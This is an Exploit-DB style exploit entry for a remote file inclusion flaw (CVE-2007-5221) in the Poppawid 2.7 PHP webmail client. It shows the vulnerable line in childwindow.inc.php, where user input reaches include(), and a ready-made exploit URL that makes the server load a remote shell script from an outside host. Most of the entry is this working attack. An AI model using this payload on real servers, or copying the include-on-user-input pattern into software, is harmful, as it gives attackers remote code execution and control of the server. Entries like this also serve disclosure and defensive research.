Exploit Poppawid 2.7 - 'form' Remote File Inclusion

[Exploiter]

EDB-ID

4481

Проверка EDB

1. Пройдено

Автор

0IN

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-5221

Дата публикации

2007-10-02

#Poppawid Remote File include
#f0und bY 0in
#Greetings to: All Dark-Coders Team Members
#IRC: #dark-coders at warszawa.irc.pl
#About:popper_mod-wid is a free (and popular), full featured web based email client
#Download:http://poppawid.sourceforge.net/
#No dork for script kiddies..;]
#Register_globals=On
#BUG:
poppawid/mail/childwindow.inc.php:33:                                   <?php include($form.".form.inc.php");?>
Expl0it:
http://x.com/[path]/mail/childwindow.inc.php?form=http://h4x0r.org/shell.txt?

# milw0rm.com [2007-10-02]